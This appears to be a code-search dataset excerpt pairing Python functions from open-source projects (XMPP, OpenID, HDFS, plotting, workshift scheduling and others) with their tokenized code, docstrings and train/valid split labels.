def get_vnetwork_dvpgs_output_vnetwork_dvpgs_datacenter(self, **kwargs): """Auto Generated Code """ config = ET.Element("config") get_vnetwork_dvpgs = ET.Element("get_vnetwork_dvpgs") config = get_vnetwork_dvpgs output = ET.SubElement(get_vnetwork_dvpgs, "output") vnetwork_dvpgs = ET.SubElement(output, "vnetwork-dvpgs") datacenter = ET.SubElement(vnetwork_dvpgs, "datacenter") datacenter.text = kwargs.pop('datacenter') callback = kwargs.pop('callback', self._callback) return callback(config)
[ "def", "get_vnetwork_dvpgs_output_vnetwork_dvpgs_datacenter", "(", "self", ",", "*", "*", "kwargs", ")", ":", "config", "=", "ET", ".", "Element", "(", "\"config\"", ")", "get_vnetwork_dvpgs", "=", "ET", ".", "Element", "(", "\"get_vnetwork_dvpgs\"", ")", "config"...
Auto Generated Code
[ "Auto", "Generated", "Code" ]
python
train
horazont/aioxmpp
aioxmpp/pep/service.py
https://github.com/horazont/aioxmpp/blob/22a68e5e1d23f2a4dee470092adbd4672f9ef061/aioxmpp/pep/service.py#L326-L338
def close(self): """ Unclaim the PEP node and unregister the registered features. It is not necessary to call close if this claim is managed by :class:`~aioxmpp.pep.register_pep_node`. """ if self._closed: return self._closed = True self._pep_service._unclaim(self.node_namespace) self._unregister()
[ "def", "close", "(", "self", ")", ":", "if", "self", ".", "_closed", ":", "return", "self", ".", "_closed", "=", "True", "self", ".", "_pep_service", ".", "_unclaim", "(", "self", ".", "node_namespace", ")", "self", ".", "_unregister", "(", ")" ]
Unclaim the PEP node and unregister the registered features. It is not necessary to call close if this claim is managed by :class:`~aioxmpp.pep.register_pep_node`.
[ "Unclaim", "the", "PEP", "node", "and", "unregister", "the", "registered", "features", "." ]
python
train
openid/python-openid
openid/consumer/consumer.py
https://github.com/openid/python-openid/blob/f7e13536f0d1828d3cef5ae7a7b55cabadff37fc/openid/consumer/consumer.py#L687-L699
def _checkSetupNeeded(self, message): """Check an id_res message to see if it is a checkid_immediate cancel response. @raises SetupNeededError: if it is a checkid_immediate cancellation """ # In OpenID 1, we check to see if this is a cancel from # immediate mode by the presence of the user_setup_url # parameter. if message.isOpenID1(): user_setup_url = message.getArg(OPENID1_NS, 'user_setup_url') if user_setup_url is not None: raise SetupNeededError(user_setup_url)
[ "def", "_checkSetupNeeded", "(", "self", ",", "message", ")", ":", "# In OpenID 1, we check to see if this is a cancel from", "# immediate mode by the presence of the user_setup_url", "# parameter.", "if", "message", ".", "isOpenID1", "(", ")", ":", "user_setup_url", "=", "me...
Check an id_res message to see if it is a checkid_immediate cancel response. @raises SetupNeededError: if it is a checkid_immediate cancellation
[ "Check", "an", "id_res", "message", "to", "see", "if", "it", "is", "a", "checkid_immediate", "cancel", "response", "." ]
python
train
brianhie/scanorama
scanorama/scanorama.py
https://github.com/brianhie/scanorama/blob/57aafac87d07a8d682f57450165dd07f066ebb3c/scanorama/scanorama.py#L114-L169
def integrate(datasets_full, genes_list, batch_size=BATCH_SIZE, verbose=VERBOSE, ds_names=None, dimred=DIMRED, approx=APPROX, sigma=SIGMA, alpha=ALPHA, knn=KNN, geosketch=False, geosketch_max=20000, n_iter=1, union=False, hvg=None): """Integrate a list of data sets. Parameters ---------- datasets_full : `list` of `scipy.sparse.csr_matrix` or of `numpy.ndarray` Data sets to integrate and correct. genes_list: `list` of `list` of `string` List of genes for each data set. batch_size: `int`, optional (default: `5000`) The batch size used in the alignment vector computation. Useful when correcting very large (>100k samples) data sets. Set to large value that runs within available memory. verbose: `bool` or `int`, optional (default: 2) When `True` or not equal to 0, prints logging output. ds_names: `list` of `string`, optional When `verbose=True`, reports data set names in logging output. dimred: `int`, optional (default: 100) Dimensionality of integrated embedding. approx: `bool`, optional (default: `True`) Use approximate nearest neighbors, greatly speeds up matching runtime. sigma: `float`, optional (default: 15) Correction smoothing parameter on Gaussian kernel. alpha: `float`, optional (default: 0.10) Alignment score minimum cutoff. knn: `int`, optional (default: 20) Number of nearest neighbors to use for matching. hvg: `int`, optional (default: None) Use this number of top highly variable genes based on dispersion. Returns ------- integrated, genes Returns a two-tuple containing a list of `numpy.ndarray` with integrated low dimensional embeddings and a single list of genes containing the intersection of inputted genes. """ datasets_full = check_datasets(datasets_full) datasets, genes = merge_datasets(datasets_full, genes_list, ds_names=ds_names, union=union) datasets_dimred, genes = process_data(datasets, genes, hvg=hvg, dimred=dimred) for _ in range(n_iter): datasets_dimred = assemble( datasets_dimred, # Assemble in low dimensional space. verbose=verbose, knn=knn, sigma=sigma, approx=approx, alpha=alpha, ds_names=ds_names, batch_size=batch_size, geosketch=geosketch, geosketch_max=geosketch_max, ) return datasets_dimred, genes
[ "def", "integrate", "(", "datasets_full", ",", "genes_list", ",", "batch_size", "=", "BATCH_SIZE", ",", "verbose", "=", "VERBOSE", ",", "ds_names", "=", "None", ",", "dimred", "=", "DIMRED", ",", "approx", "=", "APPROX", ",", "sigma", "=", "SIGMA", ",", ...
Integrate a list of data sets. Parameters ---------- datasets_full : `list` of `scipy.sparse.csr_matrix` or of `numpy.ndarray` Data sets to integrate and correct. genes_list: `list` of `list` of `string` List of genes for each data set. batch_size: `int`, optional (default: `5000`) The batch size used in the alignment vector computation. Useful when correcting very large (>100k samples) data sets. Set to large value that runs within available memory. verbose: `bool` or `int`, optional (default: 2) When `True` or not equal to 0, prints logging output. ds_names: `list` of `string`, optional When `verbose=True`, reports data set names in logging output. dimred: `int`, optional (default: 100) Dimensionality of integrated embedding. approx: `bool`, optional (default: `True`) Use approximate nearest neighbors, greatly speeds up matching runtime. sigma: `float`, optional (default: 15) Correction smoothing parameter on Gaussian kernel. alpha: `float`, optional (default: 0.10) Alignment score minimum cutoff. knn: `int`, optional (default: 20) Number of nearest neighbors to use for matching. hvg: `int`, optional (default: None) Use this number of top highly variable genes based on dispersion. Returns ------- integrated, genes Returns a two-tuple containing a list of `numpy.ndarray` with integrated low dimensional embeddings and a single list of genes containing the intersection of inputted genes.
[ "Integrate", "a", "list", "of", "data", "sets", "." ]
python
train
aio-libs/aioredis
aioredis/pubsub.py
https://github.com/aio-libs/aioredis/blob/e8c33e39558d4cc91cf70dde490d8b330c97dc2e/aioredis/pubsub.py#L313-L324
def iter(self, *, encoding=None, decoder=None): """Returns async iterator. Usage example: >>> async for ch, msg in mpsc.iter(): ... print(ch, msg) """ return _IterHelper(self, is_active=lambda r: not r._queue.exhausted, encoding=encoding, decoder=decoder)
[ "def", "iter", "(", "self", ",", "*", ",", "encoding", "=", "None", ",", "decoder", "=", "None", ")", ":", "return", "_IterHelper", "(", "self", ",", "is_active", "=", "lambda", "r", ":", "not", "r", ".", "_queue", ".", "exhausted", ",", "encoding", ...
Returns async iterator. Usage example: >>> async for ch, msg in mpsc.iter(): ... print(ch, msg)
[ "Returns", "async", "iterator", "." ]
python
train
reingart/pyafipws
utils.py
https://github.com/reingart/pyafipws/blob/ee87cfe4ac12285ab431df5fec257f103042d1ab/utils.py#L903-L919
def abrir_conf(config_file, debug=False): "Abrir el archivo de configuración (usar primer parámetro como ruta)" # en principio, usar el nombre de archivo predeterminado # si se pasa el archivo de configuración por parámetro, confirmar que exista # y descartar que sea una opción if len(sys.argv)>1: if os.path.splitext(sys.argv[1])[1].lower() == ".ini": config_file = sys.argv.pop(1) if not os.path.exists(config_file) or not os.path.isfile(config_file): warnings.warn("Archivo de configuracion %s invalido" % config_file) if debug: print "CONFIG_FILE:", config_file config = SafeConfigParser() config.read(config_file) return config
[ "def", "abrir_conf", "(", "config_file", ",", "debug", "=", "False", ")", ":", "# en principio, usar el nombre de archivo predeterminado", "# si se pasa el archivo de configuración por parámetro, confirmar que exista", "# y descartar que sea una opción", "if", "len", "(", "sys", "....
Abrir el archivo de configuración (usar primer parámetro como ruta)
[ "Abrir", "el", "archivo", "de", "configuración", "(", "usar", "primer", "parámetro", "como", "ruta", ")" ]
python
train
numenta/nupic
src/nupic/algorithms/fdrutilities.py
https://github.com/numenta/nupic/blob/5922fafffdccc8812e72b3324965ad2f7d4bbdad/src/nupic/algorithms/fdrutilities.py#L65-L94
def generateCoincMatrix(nCoinc=10, length=500, activity=50): """ Generate a coincidence matrix. This is used to generate random inputs to the temporal learner and to compare the predicted output against. It generates a matrix of nCoinc rows, each row has length 'length' and has a total of 'activity' bits on. Parameters: ----------------------------------------------- nCoinc: the number of rows to generate length: the length of each row activity: the number of ones to put into each row. """ coincMatrix0 = SM32(int(nCoinc), int(length)) theOnes = numpy.array([1.0] * activity, dtype=numpy.float32) for rowIdx in xrange(nCoinc): coinc = numpy.array(random.sample(xrange(length), activity), dtype=numpy.uint32) coinc.sort() coincMatrix0.setRowFromSparse(rowIdx, coinc, theOnes) # This is the right code to use, it's faster, but it derails the unit # testing of the pooling for now. coincMatrix = SM32(int(nCoinc), int(length)) coincMatrix.initializeWithFixedNNZR(activity) return coincMatrix0
[ "def", "generateCoincMatrix", "(", "nCoinc", "=", "10", ",", "length", "=", "500", ",", "activity", "=", "50", ")", ":", "coincMatrix0", "=", "SM32", "(", "int", "(", "nCoinc", ")", ",", "int", "(", "length", ")", ")", "theOnes", "=", "numpy", ".", ...
Generate a coincidence matrix. This is used to generate random inputs to the temporal learner and to compare the predicted output against. It generates a matrix of nCoinc rows, each row has length 'length' and has a total of 'activity' bits on. Parameters: ----------------------------------------------- nCoinc: the number of rows to generate length: the length of each row activity: the number of ones to put into each row.
[ "Generate", "a", "coincidence", "matrix", ".", "This", "is", "used", "to", "generate", "random", "inputs", "to", "the", "temporal", "learner", "and", "to", "compare", "the", "predicted", "output", "against", "." ]
python
valid
timothydmorton/isochrones
isochrones/starmodel.py
https://github.com/timothydmorton/isochrones/blob/d84495573044c66db2fd6b959fe69e370757ea14/isochrones/starmodel.py#L559-L577
def mnest_basename(self): """Full path to basename """ if not hasattr(self, '_mnest_basename'): s = self.labelstring if s=='0_0': s = 'single' elif s=='0_0-0_1': s = 'binary' elif s=='0_0-0_1-0_2': s = 'triple' s = '{}-{}'.format(self.ic.name, s) self._mnest_basename = os.path.join('chains', s+'-') if os.path.isabs(self._mnest_basename): return self._mnest_basename else: return os.path.join(self.directory, self._mnest_basename)
[ "def", "mnest_basename", "(", "self", ")", ":", "if", "not", "hasattr", "(", "self", ",", "'_mnest_basename'", ")", ":", "s", "=", "self", ".", "labelstring", "if", "s", "==", "'0_0'", ":", "s", "=", "'single'", "elif", "s", "==", "'0_0-0_1'", ":", "...
Full path to basename
[ "Full", "path", "to", "basename" ]
python
train
getfleety/coralillo
coralillo/fields.py
https://github.com/getfleety/coralillo/blob/9cac101738a0fa7c1106f129604c00ef703370e1/coralillo/fields.py#L173-L177
def delete(self, redis): ''' Deletes this field's value from the databse. Should be implemented in special cases ''' value = getattr(self.obj, self.name) redis.srem(self.key() + ':' + value, self.obj.id)
[ "def", "delete", "(", "self", ",", "redis", ")", ":", "value", "=", "getattr", "(", "self", ".", "obj", ",", "self", ".", "name", ")", "redis", ".", "srem", "(", "self", ".", "key", "(", ")", "+", "':'", "+", "value", ",", "self", ".", "obj", ...
Deletes this field's value from the databse. Should be implemented in special cases
[ "Deletes", "this", "field", "s", "value", "from", "the", "databse", ".", "Should", "be", "implemented", "in", "special", "cases" ]
python
train
ClericPy/torequests
torequests/utils.py
https://github.com/ClericPy/torequests/blob/1793261688d7a47e1c3a0830d83f8552f5e3e5d9/torequests/utils.py#L622-L633
def search(self, string, default=None): """Use re.search to find the result :rtype: list""" default = default if default else [] result = [item[1] for item in self.container if item[0].search(string)] if self.ensure_mapping: assert len(result) < 2, "%s matches more than one pattern: %s" % ( string, result, ) return result if result else default
[ "def", "search", "(", "self", ",", "string", ",", "default", "=", "None", ")", ":", "default", "=", "default", "if", "default", "else", "[", "]", "result", "=", "[", "item", "[", "1", "]", "for", "item", "in", "self", ".", "container", "if", "item"...
Use re.search to find the result :rtype: list
[ "Use", "re", ".", "search", "to", "find", "the", "result" ]
python
train
Neurosim-lab/netpyne
doc/source/code/HHCellFile.py
https://github.com/Neurosim-lab/netpyne/blob/edb67b5098b2e7923d55010ded59ad1bf75c0f18/doc/source/code/HHCellFile.py#L66-L78
def defineBiophysics(self): """Assign the membrane properties across the cell.""" # Insert active Hodgkin-Huxley current in the soma self.soma.insert('hh') self.soma.gnabar_hh = 0.12 # Sodium conductance in S/cm2 self.soma.gkbar_hh = 0.036 # Potassium conductance in S/cm2 self.soma.gl_hh = 0.003 # Leak conductance in S/cm2 self.soma.el_hh = -70 # Reversal potential in mV self.dend.insert('pas') self.dend.g_pas = 0.001 # Passive conductance in S/cm2 self.dend.e_pas = -65 # Leak reversal potential mV self.dend.nseg = 1000
[ "def", "defineBiophysics", "(", "self", ")", ":", "# Insert active Hodgkin-Huxley current in the soma", "self", ".", "soma", ".", "insert", "(", "'hh'", ")", "self", ".", "soma", ".", "gnabar_hh", "=", "0.12", "# Sodium conductance in S/cm2", "self", ".", "soma", ...
Assign the membrane properties across the cell.
[ "Assign", "the", "membrane", "properties", "across", "the", "cell", "." ]
python
train
noahbenson/neuropythy
neuropythy/util/core.py
https://github.com/noahbenson/neuropythy/blob/b588889f6db36ddb9602ae4a72c1c0d3f41586b2/neuropythy/util/core.py#L819-L845
def tangent(x, null=(-np.inf, np.inf), rtol=default_rtol, atol=default_atol): ''' tangent(x) is equivalent to tan(x) except that it also works on sparse arrays. The optional argument null (default, (-numpy.inf, numpy.inf)) may be specified to indicate what value(s) should be assigned when x == -pi/2 or -pi/2. If only one number is given, then it is used for both values; otherwise the first value corresponds to -pi/2 and the second to pi/2. A value of x is considered to be equal to one of these valids based on numpy.isclose. The optional arguments rtol and atol are passed along to isclose. If null is None, then no replacement is performed. ''' if sps.issparse(x): x = x.copy() x.data = tangent(x.data, null=null, rtol=rtol, atol=atol) return x else: x = np.asarray(x) if rtol is None: rtol = default_rtol if atol is None: atol = default_atol try: (nln,nlp) = null except Exception: (nln,nlp) = (null,null) x = np.mod(x + pi, tau) - pi ii = None if nln is None else np.where(np.isclose(x, neghpi, rtol=rtol, atol=atol)) jj = None if nlp is None else np.where(np.isclose(x, hpi, rtol=rtol, atol=atol)) x = np.tan(x) if ii: x[ii] = nln if jj: x[jj] = nlp return x
[ "def", "tangent", "(", "x", ",", "null", "=", "(", "-", "np", ".", "inf", ",", "np", ".", "inf", ")", ",", "rtol", "=", "default_rtol", ",", "atol", "=", "default_atol", ")", ":", "if", "sps", ".", "issparse", "(", "x", ")", ":", "x", "=", "x...
tangent(x) is equivalent to tan(x) except that it also works on sparse arrays. The optional argument null (default, (-numpy.inf, numpy.inf)) may be specified to indicate what value(s) should be assigned when x == -pi/2 or -pi/2. If only one number is given, then it is used for both values; otherwise the first value corresponds to -pi/2 and the second to pi/2. A value of x is considered to be equal to one of these valids based on numpy.isclose. The optional arguments rtol and atol are passed along to isclose. If null is None, then no replacement is performed.
[ "tangent", "(", "x", ")", "is", "equivalent", "to", "tan", "(", "x", ")", "except", "that", "it", "also", "works", "on", "sparse", "arrays", "." ]
python
train
open-homeautomation/pknx
knxip/ip.py
https://github.com/open-homeautomation/pknx/blob/a8aed8271563923c447aa330ba7c1c2927286f7a/knxip/ip.py#L129-L170
def from_body(cls, cemi): """Create a new CEMIMessage initialized from the given CEMI data.""" # TODO: check that length matches message = cls() message.code = cemi[0] offset = cemi[1] message.ctl1 = cemi[2 + offset] message.ctl2 = cemi[3 + offset] message.src_addr = cemi[4 + offset] * 256 + cemi[5 + offset] message.dst_addr = cemi[6 + offset] * 256 + cemi[7 + offset] message.mpdu_len = cemi[8 + offset] tpci_apci = cemi[9 + offset] * 256 + cemi[10 + offset] apci = tpci_apci & 0x3ff # for APCI codes see KNX Standard 03/03/07 Application layer # table Application Layer control field if apci & 0x080: # Group write message.cmd = CEMIMessage.CMD_GROUP_WRITE elif apci == 0: message.cmd = CEMIMessage.CMD_GROUP_READ elif apci & 0x40: message.cmd = CEMIMessage.CMD_GROUP_RESPONSE else: message.cmd = CEMIMessage.CMD_UNKNOWN apdu = cemi[10 + offset:] if len(apdu) != message.mpdu_len: raise KNXException( "APDU LEN should be {} but is {}".format( message.mpdu_len, len(apdu))) if len(apdu) == 1: message.data = [apci & 0x2f] else: message.data = cemi[11 + offset:] return message
[ "def", "from_body", "(", "cls", ",", "cemi", ")", ":", "# TODO: check that length matches", "message", "=", "cls", "(", ")", "message", ".", "code", "=", "cemi", "[", "0", "]", "offset", "=", "cemi", "[", "1", "]", "message", ".", "ctl1", "=", "cemi", ...
Create a new CEMIMessage initialized from the given CEMI data.
[ "Create", "a", "new", "CEMIMessage", "initialized", "from", "the", "given", "CEMI", "data", "." ]
python
train
simoninireland/epyc
epyc/clusterlab.py
https://github.com/simoninireland/epyc/blob/b3b61007741a0ab3de64df89070a6f30de8ec268/epyc/clusterlab.py#L351-L365
def cancelPendingResultsFor( self, params ): """Cancel any results pending for experiments at the given point in the parameter space. :param params: the experimental parameters""" # grab the result job ids jobs = self.pendingResultsFor(params) if len(jobs) > 0: # abort in the cluster self._abortJobs(jobs) # cancel in the notebook self.notebook().cancelPendingResultsFor(params)
[ "def", "cancelPendingResultsFor", "(", "self", ",", "params", ")", ":", "# grab the result job ids", "jobs", "=", "self", ".", "pendingResultsFor", "(", "params", ")", "if", "len", "(", "jobs", ")", ">", "0", ":", "# abort in the cluster", "self", ".", "_abort...
Cancel any results pending for experiments at the given point in the parameter space. :param params: the experimental parameters
[ "Cancel", "any", "results", "pending", "for", "experiments", "at", "the", "given", "point", "in", "the", "parameter", "space", "." ]
python
train
QuantEcon/QuantEcon.py
quantecon/lss.py
https://github.com/QuantEcon/QuantEcon.py/blob/26a66c552f2a73967d7efb6e1f4b4c4985a12643/quantecon/lss.py#L160-L200
def simulate(self, ts_length=100, random_state=None): r""" Simulate a time series of length ts_length, first drawing .. math:: x_0 \sim N(\mu_0, \Sigma_0) Parameters ---------- ts_length : scalar(int), optional(default=100) The length of the simulation random_state : int or np.random.RandomState, optional Random seed (integer) or np.random.RandomState instance to set the initial state of the random number generator for reproducibility. If None, a randomly initialized RandomState is used. Returns ------- x : array_like(float) An n x ts_length array, where the t-th column is :math:`x_t` y : array_like(float) A k x ts_length array, where the t-th column is :math:`y_t` """ random_state = check_random_state(random_state) x0 = multivariate_normal(self.mu_0.flatten(), self.Sigma_0) w = random_state.randn(self.m, ts_length-1) v = self.C.dot(w) # Multiply each w_t by C to get v_t = C w_t # == simulate time series == # x = simulate_linear_model(self.A, x0, v, ts_length) if self.H is not None: v = random_state.randn(self.l, ts_length) y = self.G.dot(x) + self.H.dot(v) else: y = self.G.dot(x) return x, y
[ "def", "simulate", "(", "self", ",", "ts_length", "=", "100", ",", "random_state", "=", "None", ")", ":", "random_state", "=", "check_random_state", "(", "random_state", ")", "x0", "=", "multivariate_normal", "(", "self", ".", "mu_0", ".", "flatten", "(", ...
r""" Simulate a time series of length ts_length, first drawing .. math:: x_0 \sim N(\mu_0, \Sigma_0) Parameters ---------- ts_length : scalar(int), optional(default=100) The length of the simulation random_state : int or np.random.RandomState, optional Random seed (integer) or np.random.RandomState instance to set the initial state of the random number generator for reproducibility. If None, a randomly initialized RandomState is used. Returns ------- x : array_like(float) An n x ts_length array, where the t-th column is :math:`x_t` y : array_like(float) A k x ts_length array, where the t-th column is :math:`y_t`
[ "r", "Simulate", "a", "time", "series", "of", "length", "ts_length", "first", "drawing" ]
python
train
phaethon/kamene
kamene/plist.py
https://github.com/phaethon/kamene/blob/11d4064844f4f68ac5d7546f5633ac7d02082914/kamene/plist.py#L479-L490
def summary(self, prn=None, lfilter=None): """prints a summary of each SndRcv packet pair prn: function to apply to each packet pair instead of lambda s, r: "%s ==> %s" % (s.summary(),r.summary()) lfilter: truth function to apply to each packet pair to decide whether it will be displayed""" for s, r in self.res: if lfilter is not None: if not lfilter(s, r): continue if prn is None: print(self._elt2sum((s, r))) else: print(prn(s, r))
[ "def", "summary", "(", "self", ",", "prn", "=", "None", ",", "lfilter", "=", "None", ")", ":", "for", "s", ",", "r", "in", "self", ".", "res", ":", "if", "lfilter", "is", "not", "None", ":", "if", "not", "lfilter", "(", "s", ",", "r", ")", ":...
prints a summary of each SndRcv packet pair prn: function to apply to each packet pair instead of lambda s, r: "%s ==> %s" % (s.summary(),r.summary()) lfilter: truth function to apply to each packet pair to decide whether it will be displayed
[ "prints", "a", "summary", "of", "each", "SndRcv", "packet", "pair", "prn", ":", "function", "to", "apply", "to", "each", "packet", "pair", "instead", "of", "lambda", "s", "r", ":", "%s", "==", ">", "%s", "%", "(", "s", ".", "summary", "()", "r", "....
python
train
hthiery/python-fritzhome
pyfritzhome/fritzhome.py
https://github.com/hthiery/python-fritzhome/blob/c74bd178d08a305028f316f7da35202da3526f61/pyfritzhome/fritzhome.py#L492-L503
def get_hkr_state(self): """Get the thermostate state.""" self.update() try: return { 126.5: 'off', 127.0: 'on', self.eco_temperature: 'eco', self.comfort_temperature: 'comfort' }[self.target_temperature] except KeyError: return 'manual'
[ "def", "get_hkr_state", "(", "self", ")", ":", "self", ".", "update", "(", ")", "try", ":", "return", "{", "126.5", ":", "'off'", ",", "127.0", ":", "'on'", ",", "self", ".", "eco_temperature", ":", "'eco'", ",", "self", ".", "comfort_temperature", ":"...
Get the thermostate state.
[ "Get", "the", "thermostate", "state", "." ]
python
train
chaoss/grimoirelab-sortinghat
sortinghat/cmd/withdraw.py
https://github.com/chaoss/grimoirelab-sortinghat/blob/391cd37a75fea26311dc6908bc1c953c540a8e04/sortinghat/cmd/withdraw.py#L97-L125
def withdraw(self, uuid, organization, from_date=None, to_date=None): """Withdraw a unique identity from an organization. This method removes all the enrollments between the unique identity, identified by <uuid>, and <organization>. Both entities must exist on the registry before being deleted. When a period of time is given using either <from_date> and <to_date> parameters, it will remove those enrollments which their periods fall between these two parameters. Default values for these dates are '1900-01-01' and '2100-01-01'. :param uuid: unique identifier :param organization: name of the organization :param from_date: date when the enrollment starts :param to_date: date when the enrollment ends """ # Empty or None values for uuid and organizations are not allowed, # so do nothing if not uuid or not organization: return CMD_SUCCESS try: api.delete_enrollment(self.db, uuid, organization, from_date, to_date) except (NotFoundError, InvalidValueError) as e: self.error(str(e)) return e.code return CMD_SUCCESS
[ "def", "withdraw", "(", "self", ",", "uuid", ",", "organization", ",", "from_date", "=", "None", ",", "to_date", "=", "None", ")", ":", "# Empty or None values for uuid and organizations are not allowed,", "# so do nothing", "if", "not", "uuid", "or", "not", "organi...
Withdraw a unique identity from an organization. This method removes all the enrollments between the unique identity, identified by <uuid>, and <organization>. Both entities must exist on the registry before being deleted. When a period of time is given using either <from_date> and <to_date> parameters, it will remove those enrollments which their periods fall between these two parameters. Default values for these dates are '1900-01-01' and '2100-01-01'. :param uuid: unique identifier :param organization: name of the organization :param from_date: date when the enrollment starts :param to_date: date when the enrollment ends
[ "Withdraw", "a", "unique", "identity", "from", "an", "organization", "." ]
python
train
knagra/farnsworth
workshift/views.py
https://github.com/knagra/farnsworth/blob/1b6589f0d9fea154f0a1e2231ed906764ed26d26/workshift/views.py#L62-L192
def add_workshift_context(request): """ Add workshift variables to all dictionaries passed to templates. """ if not request.user.is_authenticated(): return {} if Semester.objects.count() < 1: return { "WORKSHIFT_ENABLED": False, } # Current semester is for navbar notifications try: current_semester = Semester.objects.get(current=True) except Semester.DoesNotExist: current_semester = None except Semester.MultipleObjectsReturned: current_semester = Semester.objects.filter( current=True, ).latest("start_date") workshift_emails = [] for pos in Manager.objects.filter(workshift_manager=True, active=True): if pos.email: workshift_emails.append(pos.email) elif pos.incumbent.email_visible and pos.incumbent.user.email: workshift_emails.append(pos.incumbent.user.email) if workshift_emails: workshift_email_str = " ({})".format( ", ".join( "<a href=\"mailto:{0}\">{0}</a>".format(i) for i in workshift_emails ), ) else: workshift_email_str = "" messages.add_message( request, messages.WARNING, MESSAGES["MULTIPLE_CURRENT_SEMESTERS"].format( admin_email=settings.ADMINS[0][1], workshift_emails=workshift_email_str, ), ) today = localtime(now()).date() days_passed = None total_days = None semester_percentage = None standing = None happening_now = None workshift_profile = None if current_semester: # number of days passed in this semester days_passed = (today - current_semester.start_date).days # total number of days in this semester total_days = ( current_semester.end_date - current_semester.start_date ).days semester_percentage = round((days_passed / total_days) * 100, 2) # Semester is for populating the current page try: semester = request.semester except AttributeError: semester = current_semester try: workshift_profile = WorkshiftProfile.objects.get( semester=semester, user=request.user, ) except WorkshiftProfile.DoesNotExist: workshift_profile = None workshift_manager = utils.can_manage(request.user, semester=semester) upcoming_shifts = WorkshiftInstance.objects.filter( workshifter=workshift_profile, closed=False, date__gte=today, date__lte=today + timedelta(days=2), ) # TODO: Add a fudge factor of an hour to this? time = localtime(now()).time() happening_now = [] for shift in upcoming_shifts: if shift.week_long: happening_now.append(shift) continue if shift.date != today: continue if shift.start_time is None: if shift.end_time is not None: if time < shift.end_time: happening_now.append(shift) else: happening_now.append(shift) continue if shift.end_time is None: if shift.start_time is not None: if time > shift.start_time: happening_now.append(shift) else: happening_now.append(shift) continue if time > shift.start_time and time < shift.end_time: happening_now.append(shift) if workshift_profile: try: standing = workshift_profile.pool_hours.get( pool__is_primary=True, ).standing except (PoolHours.DoesNotExist, PoolHours.MultipleObjectsReturned): pass return { "WORKSHIFT_ENABLED": True, "SEMESTER": semester, "CURRENT_SEMESTER": current_semester, "WORKSHIFT_MANAGER": workshift_manager, "WORKSHIFT_PROFILE": workshift_profile, "STANDING": standing, "DAYS_PASSED": days_passed, "TOTAL_DAYS": total_days, "SEMESTER_PERCENTAGE": semester_percentage, "UPCOMING_SHIFTS": zip(upcoming_shifts, happening_now), }
[ "def", "add_workshift_context", "(", "request", ")", ":", "if", "not", "request", ".", "user", ".", "is_authenticated", "(", ")", ":", "return", "{", "}", "if", "Semester", ".", "objects", ".", "count", "(", ")", "<", "1", ":", "return", "{", "\"WORKSH...
Add workshift variables to all dictionaries passed to templates.
[ "Add", "workshift", "variables", "to", "all", "dictionaries", "passed", "to", "templates", "." ]
python
train
spacetelescope/drizzlepac
drizzlepac/imageObject.py
https://github.com/spacetelescope/drizzlepac/blob/15bec3c929a6a869d9e71b9398ced43ede0620f1/drizzlepac/imageObject.py#L617-L629
def getskyimg(self,chip): """ Notes ===== Return an array representing the sky image for the detector. The value of the sky is what would actually be subtracted from the exposure by the skysub step. :units: electrons """ sci_chip = self._image[self.scienceExt,chip] return np.ones(sci_chip.image_shape,dtype=sci_chip.image_dtype)*sci_chip.subtractedSky
[ "def", "getskyimg", "(", "self", ",", "chip", ")", ":", "sci_chip", "=", "self", ".", "_image", "[", "self", ".", "scienceExt", ",", "chip", "]", "return", "np", ".", "ones", "(", "sci_chip", ".", "image_shape", ",", "dtype", "=", "sci_chip", ".", "i...
Notes ===== Return an array representing the sky image for the detector. The value of the sky is what would actually be subtracted from the exposure by the skysub step. :units: electrons
[ "Notes", "=====", "Return", "an", "array", "representing", "the", "sky", "image", "for", "the", "detector", ".", "The", "value", "of", "the", "sky", "is", "what", "would", "actually", "be", "subtracted", "from", "the", "exposure", "by", "the", "skysub", "s...
python
train
pydata/xarray
xarray/plot/plot.py
https://github.com/pydata/xarray/blob/6d93a95d05bdbfc33fff24064f67d29dd891ab58/xarray/plot/plot.py#L823-L869
def pcolormesh(x, y, z, ax, infer_intervals=None, **kwargs): """ Pseudocolor plot of 2d DataArray Wraps :func:`matplotlib:matplotlib.pyplot.pcolormesh` """ # decide on a default for infer_intervals (GH781) x = np.asarray(x) if infer_intervals is None: if hasattr(ax, 'projection'): if len(x.shape) == 1: infer_intervals = True else: infer_intervals = False else: infer_intervals = True if (infer_intervals and ((np.shape(x)[0] == np.shape(z)[1]) or ((x.ndim > 1) and (np.shape(x)[1] == np.shape(z)[1])))): if len(x.shape) == 1: x = _infer_interval_breaks(x, check_monotonic=True) else: # we have to infer the intervals on both axes x = _infer_interval_breaks(x, axis=1) x = _infer_interval_breaks(x, axis=0) if (infer_intervals and (np.shape(y)[0] == np.shape(z)[0])): if len(y.shape) == 1: y = _infer_interval_breaks(y, check_monotonic=True) else: # we have to infer the intervals on both axes y = _infer_interval_breaks(y, axis=1) y = _infer_interval_breaks(y, axis=0) primitive = ax.pcolormesh(x, y, z, **kwargs) # by default, pcolormesh picks "round" values for bounds # this results in ugly looking plots with lots of surrounding whitespace if not hasattr(ax, 'projection') and x.ndim == 1 and y.ndim == 1: # not a cartopy geoaxis ax.set_xlim(x[0], x[-1]) ax.set_ylim(y[0], y[-1]) return primitive
[ "def", "pcolormesh", "(", "x", ",", "y", ",", "z", ",", "ax", ",", "infer_intervals", "=", "None", ",", "*", "*", "kwargs", ")", ":", "# decide on a default for infer_intervals (GH781)", "x", "=", "np", ".", "asarray", "(", "x", ")", "if", "infer_intervals...
Pseudocolor plot of 2d DataArray Wraps :func:`matplotlib:matplotlib.pyplot.pcolormesh`
[ "Pseudocolor", "plot", "of", "2d", "DataArray" ]
python
train
jingw/pyhdfs
pyhdfs.py
https://github.com/jingw/pyhdfs/blob/b382b34f7cb28b41559f5be73102beb1732cd933/pyhdfs.py#L447-L462
def concat(self, target, sources, **kwargs): """Concat existing files together. For preconditions, see https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/filesystem/filesystem.html#void_concatPath_p_Path_sources :param target: the path to the target destination. :param sources: the paths to the sources to use for the concatenation. :type sources: list """ if isinstance(sources, basestring): raise ValueError("sources should be a list") if any(',' in s for s in sources): raise NotImplementedError("WebHDFS does not support commas in concat") response = self._post(target, 'CONCAT', sources=','.join(sources), **kwargs) assert not response.content
[ "def", "concat", "(", "self", ",", "target", ",", "sources", ",", "*", "*", "kwargs", ")", ":", "if", "isinstance", "(", "sources", ",", "basestring", ")", ":", "raise", "ValueError", "(", "\"sources should be a list\"", ")", "if", "any", "(", "','", "in...
